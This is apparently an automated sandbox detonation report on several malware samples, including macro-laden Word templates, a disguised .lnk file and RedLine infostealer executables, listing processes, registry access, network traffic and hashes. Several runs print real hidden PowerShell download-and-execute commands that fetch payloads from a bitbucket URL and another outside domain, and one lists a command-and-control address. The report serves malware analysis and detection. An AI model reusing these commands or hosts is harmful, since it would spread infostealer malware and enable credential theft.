SHA512 ca504af192e3318359d4742a2ef26ae1b5d040a4f9942782e02549a310158d5d5dbf919b4c748c31ee609d2046bd23ee0c22712891c86ae4a1e3a58c6e67647e

C:\Users\Admin\AppData\Local\Temp\tmp819E.tmp.bat

MD5 168931cc13b197f0babad9cb74bdc699
SHA1 cf945a0e69e6b782bceff0d5f295b1e43f246230
SHA256 447afe31bbd185a63d794c73b0c81c25eacfd297ca454a1a956c61e39e9ad16a
SHA512 23df1fff1e7e0611c72614021f86ce284d8e457af855f60d2edf21cecb95fc0526aa241c1b6126c75536829bc68b29fb26704211f089cf32753047d142a5e985

memory/2708-52-0x000007FEF5D30000-0x000007FEF671C000-memory.dmp

memory/284-57-0x00000000008C0000-0x00000000008D8000-memory.dmp

Analysis: behavioral12

Detonation Overview

Submitted

2024-11-11 02:36

Reported

2024-11-11 02:42

Platform

win10v2004-20241007-en

Max time kernel

150s

Max time network

151s

Command Line

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\Servicing-invoice-template.pdf"

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language (7 events) C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
20 events N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 224 wrote to memory of 4624 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 4624 wrote to memory of 1444 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 4624 wrote to memory of 972 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

Processes

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\Servicing-invoice-template.pdf"

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=EAAD656E9D4C73E718B1FA08A3860A89 --mojo-platform-channel-handle=1732 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=12CCCDAA9BB66E63950CE1DA200ABCE4 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=12CCCDAA9BB66E63950CE1DA200ABCE4 --renderer-client-id=2 --mojo-platform-channel-handle=1756 --allow-no-sandbox-job /prefetch:1

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=40B9D9A3289D1FC6F7B8EE0EAB02FD70 --mojo-platform-channel-handle=2308 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=70D905C0A244EDFA2CF80C735A0C2788 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=70D905C0A244EDFA2CF80C735A0C2788 --renderer-client-id=5 --mojo-platform-channel-handle=1960 --allow-no-sandbox-job /prefetch:1

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=4E131FA6D7A76DA7482422BA4921E3C2 --mojo-platform-channel-handle=2688 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=3CD46DBD0CBDBBF1467E62E117F5CD6F --mojo-platform-channel-handle=1848 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2

Network

Country Destination Domain Proto
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 23.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 135.240.123.92.in-addr.arpa udp
US 8.8.8.8:53 107.117.19.2.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp

Files

C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

MD5 b30d3becc8731792523d599d949e63f5
SHA1 19350257e42d7aee17fb3bf139a9d3adb330fad4
SHA256 b1b77e96279ead2b460de3de70e2ea4f5ad1b853598a4e27a5caf3f1a32cc4f3
SHA512 523f54895fb07f62b9a5f72c8b62e83d4d9506bda57b183818615f6eb7286e3b9c5a50409bc5c5164867c3ccdeae88aa395ecca6bc7e36d991552f857510792e

C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

MD5 752a1f26b18748311b691c7d8fc20633
SHA1 c1f8e83eebc1cc1e9b88c773338eb09ff82ab862
SHA256 111dac2948e4cecb10b0d2e10d8afaa663d78d643826b592d6414a1fd77cc131
SHA512 a2f5f262faf2c3e9756da94b2c47787ce3a9391b5bd53581578aa9a764449e114836704d6dec4aadc097fed4c818831baa11affa1eb25be2bfad9349bb090fe5

C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

MD5 a8ba35cf0d2196d5e21cff5824e0746b
SHA1 1947ff92508fc788d6976adc45cda309d5cdfc58
SHA256 59067ae943dfaf7eb37cbc4eae2ff160fa451db9028b7ceaef48be401276f4f9
SHA512 bda2c399d1953ac3c4592e07faadd36049440fdab1b66c7040cd2c15f7aa5213e5f220b2e7bedd87ca9cacbcd0747fe68f1cefb7b43403e6a7b15ad010873a4d

memory/224-123-0x000000000B4D0000-0x000000000B77B000-memory.dmp

Analysis: behavioral29

Detonation Overview

Submitted

2024-11-11 02:36

Reported

2024-11-11 02:43

Platform

win7-20241010-en

Max time kernel

132s

Max time network

38s

Command Line

"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\fffffffnew.dotm"

Signatures

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process N/A C:\Users\Admin\AppData\Local\Temp\powershell.exe C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\powershell.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Office loads VBA resources, possible macro or embedded object present

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Processes

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\fffffffnew.dotm"

C:\Users\Admin\AppData\Local\Temp\powershell.exe

powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden -command (New-Object System.Net.WebClient).DownloadFile('https://bitbucket.org/damnman/damn/downloads/PUMPED_docc.exe','2d21412.exe');Start-Process '2d21412.exe'

C:\Windows\splwow64.exe

C:\Windows\splwow64.exe 12288

Network

N/A

Files

memory/2900-0-0x000000002FA51000-0x000000002FA52000-memory.dmp

memory/2900-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

memory/2900-2-0x0000000070B3D000-0x0000000070B48000-memory.dmp

memory/2900-6-0x0000000004F00000-0x0000000005000000-memory.dmp

memory/2900-11-0x0000000004F00000-0x0000000005000000-memory.dmp

memory/2900-13-0x0000000070B3D000-0x0000000070B48000-memory.dmp

memory/2900-14-0x0000000004F00000-0x0000000005000000-memory.dmp

Analysis: behavioral31

Detonation Overview

Submitted

2024-11-11 02:36

Reported

2024-11-11 02:42

Platform

win7-20240708-en

Max time kernel

119s

Max time network

129s

Command Line

"C:\Users\Admin\AppData\Local\Temp\fp4h5ur67j.exe"

Signatures

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A

Redline family

redline

Uses the VBS compiler for execution

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1504 set thread context of 2832 N/A C:\Users\Admin\AppData\Local\Temp\fp4h5ur67j.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\fp4h5ur67j.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1504 wrote to memory of 2832 N/A C:\Users\Admin\AppData\Local\Temp\fp4h5ur67j.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 1504 wrote to memory of 2340 N/A C:\Users\Admin\AppData\Local\Temp\fp4h5ur67j.exe C:\Windows\SysWOW64\WerFault.exe
PID 2832 wrote to memory of 2676 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\Windows\SysWOW64\WerFault.exe

Processes

C:\Users\Admin\AppData\Local\Temp\fp4h5ur67j.exe

"C:\Users\Admin\AppData\Local\Temp\fp4h5ur67j.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1504 -s 48

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2832 -s 492

Network

N/A

Files

memory/1504-0-0x00000000012FC000-0x00000000012FD000-memory.dmp

memory/2832-1-0x0000000000400000-0x0000000000446000-memory.dmp

memory/2832-2-0x0000000000400000-0x0000000000446000-memory.dmp

memory/2832-9-0x0000000000400000-0x0000000000446000-memory.dmp

memory/2832-6-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

memory/2832-8-0x0000000000400000-0x0000000000446000-memory.dmp

memory/2832-10-0x000000007494E000-0x000000007494F000-memory.dmp

Analysis: behavioral9

Detonation Overview

Submitted

2024-11-11 02:36

Reported

2024-11-11 02:42

Platform

win7-20240903-en

Max time kernel

133s

Max time network

161s

Command Line

"C:\Users\Admin\AppData\Local\Temp\PUMPED_docc.exe"

Signatures

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A

Redline family

redline

Uses the VBS compiler for execution

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1444 set thread context of 2372 N/A C:\Users\Admin\AppData\Local\Temp\PUMPED_docc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\PUMPED_docc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\PUMPED_docc.exe

"C:\Users\Admin\AppData\Local\Temp\PUMPED_docc.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"

Network

Country Destination Domain Proto
FR 188.165.208.165:43504 tcp

Files

memory/1444-0-0x000000007436E000-0x000000007436F000-memory.dmp

memory/1444-1-0x0000000000290000-0x00000000002DA000-memory.dmp

memory/1444-2-0x0000000074360000-0x0000000074A4E000-memory.dmp

memory/2372-3-0x0000000000400000-0x0000000000428000-memory.dmp

memory/2372-4-0x0000000000400000-0x0000000000428000-memory.dmp

memory/2372-8-0x0000000000400000-0x0000000000428000-memory.dmp

memory/2372-7-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

memory/2372-6-0x0000000000400000-0x0000000000428000-memory.dmp

memory/2372-5-0x0000000000400000-0x0000000000428000-memory.dmp

memory/2372-12-0x0000000000400000-0x0000000000428000-memory.dmp

memory/2372-10-0x0000000000400000-0x0000000000428000-memory.dmp

memory/2372-13-0x0000000074360000-0x0000000074A4E000-memory.dmp

memory/1444-14-0x0000000074360000-0x0000000074A4E000-memory.dmp

memory/2372-15-0x0000000074360000-0x0000000074A4E000-memory.dmp

memory/2372-16-0x0000000074360000-0x0000000074A4E000-memory.dmp

Analysis: behavioral16

Detonation Overview

Submitted

2024-11-11 02:36

Reported

2024-11-11 02:41

Platform

win10v2004-20241007-en

Max time kernel

94s

Max time network

136s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\debt.rtf.lnk

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation C:\Windows\system32\cmd.exe N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4236 wrote to memory of 1984 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4236 wrote to memory of 1984 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\debt.rtf.lnk

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypass -Command "Start-BitsTransfer -Source 'https://musiccenterconference.com/dwl/12.ps1' -Destination $($env:APPDATA + '\12.ps1'); & $($env:APPDATA + '\12.ps1')"

Network

Country Destination Domain Proto
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 23.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 musiccenterconference.com udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 212.20.149.52.in-addr.arpa udp
US 8.8.8.8:53 241.42.69.40.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp

Files

memory/1984-2-0x00007FFFAC2A3000-0x00007FFFAC2A5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fwmm2hgm.2is.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1984-12-0x00000221D5310000-0x00000221D5332000-memory.dmp

memory/1984-13-0x00007FFFAC2A0000-0x00007FFFACD61000-memory.dmp

memory/1984-14-0x00007FFFAC2A0000-0x00007FFFACD61000-memory.dmp

memory/1984-15-0x00000221D5680000-0x00000221D56A6000-memory.dmp

memory/1984-16-0x00000221D56D0000-0x00000221D56E4000-memory.dmp

memory/1984-17-0x00007FFFAC2A0000-0x00007FFFACD61000-memory.dmp

memory/1984-20-0x00007FFFAC2A0000-0x00007FFFACD61000-memory.dmp

memory/1984-21-0x00007FFFAC2A0000-0x00007FFFACD61000-memory.dmp

Analysis: behavioral18

Detonation Overview

Submitted

2024-11-11 02:36

Reported

2024-11-11 02:42

Platform

win10v2004-20241007-en

Max time kernel

133s

Max time network

156s

Command Line

"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\eeee.dotm" /o ""

Signatures

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Processes

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE

"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\eeee.dotm" /o ""

Network

Country Destination Domain Proto
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 75.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 roaming.officeapps.live.com udp
NL 52.109.89.19:443 roaming.officeapps.live.com tcp
US 8.8.8.8:53 19.89.109.52.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 12.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 212.20.149.52.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 13.173.189.20.in-addr.arpa udp

Files

memory/4064-0-0x00007FFD561B0000-0x00007FFD561C0000-memory.dmp

memory/4064-1-0x00007FFD961CD000-0x00007FFD961CE000-memory.dmp

memory/4064-2-0x00007FFD561B0000-0x00007FFD561C0000-memory.dmp

memory/4064-3-0x00007FFD561B0000-0x00007FFD561C0000-memory.dmp

